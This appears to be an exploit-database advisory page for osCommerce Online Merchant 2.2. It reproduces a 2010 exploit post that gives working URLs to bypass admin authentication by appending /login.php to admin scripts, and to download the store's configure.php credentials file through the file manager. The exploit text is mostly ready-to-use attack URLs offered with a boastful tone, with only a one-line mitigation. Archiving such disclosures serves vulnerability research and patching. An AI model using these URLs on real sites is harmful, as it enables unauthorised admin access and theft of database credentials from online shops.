Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

vendor:

Oscommerce Online Merchant

by:

Flyff666

7,5

CVSS

HIGH

File Disclosure and Admin Bypass

200

CWE

Product Name: Oscommerce Online Merchant

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: No

Related CWE: N/A

CPE: a:oscommerce:oscommerce_online_merchant

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All OS

2010

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

An attacker can bypass the admin page authentication by appending /login.php to the end of the URL. Additionally, an attacker can download any file in the directory by appending /login.php?action=download&filename= to the end of the URL.

Mitigation:

Ensure that the admin folder is protected by .htaccess and that the URL is not vulnerable to manipulation.

Source

Exploit-DB raw data:

--------------------------------------------
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
--------------------------------------------

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : Dream_Theatre@rocketmail.com
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above


# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php